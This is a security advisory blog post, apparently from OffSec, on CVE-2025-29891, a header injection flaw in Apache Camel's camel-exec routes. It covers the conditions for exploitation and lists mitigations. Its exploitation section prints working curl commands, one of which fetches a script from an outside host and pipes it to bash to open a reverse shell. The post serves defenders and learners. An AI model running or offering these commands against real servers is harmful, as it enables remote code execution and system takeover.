
Aug 8, 2025
CVE-2025-29891 – Apache Camel Exploit via CAmelExecCommandArgs Header Injection
Discover how CVE-2025-29891 impacts Apache Camel via CAmelExecCommandArgs header injection. Learn how attackers exploit this misconfiguration for remote code execution and how to secure your systems.
Overview
CVE-2025-29891 is a remote command injection vulnerability found in Apache Camel’s HTTP endpoints when misconfigured. The flaw arises from insecure usage of the CAmelExecCommandExecutable and CAmelExecCommandArgs headers, which can be exploited to execute arbitrary commands. It affects systems where the attacker can interact with HTTP-exposed Camel routes, particularly if security hardening is weak or missing. A similar vulnerability was previously detailed by OffSec in our blog post on CVE-2025-27636.
- CVE ID: CVE-2025-29891
- Severity: Medium
- CVSS Score: 4.8
- EPSS Score: 0.24%
- Impact: Remote Code Execution
- Attack Vector: Network
- Authentication Required: No
- Vulnerable Component: camel-exec route in Apache Camel
Technical Breakdown
Apache Camel supports route execution via headers. When using the camel-exec component, it allows execution of system commands through HTTP requests that set:
- CAmelExecCommandExecutable – the binary to run (e.g., curl, bash)
- CAmelExecCommandArgs – arguments passed to the binary
If the system exposes HTTP endpoints with the camel-exec component and does not filter or validate these headers, an attacker can leverage them to execute arbitrary commands on the host system.
Conditions for Exploitation
- The Apache Camel instance must expose an HTTP endpoint utilizing camel-exec.
- The attacker must be able to send crafted HTTP requests to the endpoint.
- Headers CAmelExecCommandExecutable and CAmelExecCommandArgs must not be filtered or sanitized.
Exploitation
A route misconfiguration exposing this logic over HTTP can be weaponized to issue commands remotely. This behavior becomes critical when paired with web-accessible endpoints such as /api/system-version.
For example, a simple sleep command:
curl --header "CAmelExecCommandExecutable: sleep" \
--header "CAmelExecCommandArgs: 5" \
http://192.168.56.80:8080/api/system-version
Or for full remote command execution with a reverse shell:
curl --header "CAmelExecCommandExecutable: curl" \
--header "CAmelExecCommandArgs: 192.168.18.5:3333/rev.sh -o /tmp/rev.sh | bash /tmp/rev.sh" \
http://192.168.56.80:8080/api/system-version
The headers are interpreted and executed directly on the host, enabling full shell access if the server allows outbound connections.
Try Hands-On
You can try exploiting this vulnerability in a controlled environment via the OffSec lab for CVE-2025-29891.
Mitigation
- Do not expose camel-exec routes over publicly accessible endpoints.
Validate and sanitize headers and inputs before invoking command execution. - Use proper authentication and authorization around sensitive routes.
- Consider disabling or removing the camel-exec component unless absolutely required.
- Upgrade Apache Camel to a patched version if one is released for this CVE.
- Restrict outbound access from the server to prevent reverse shells or external payload fetching.
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!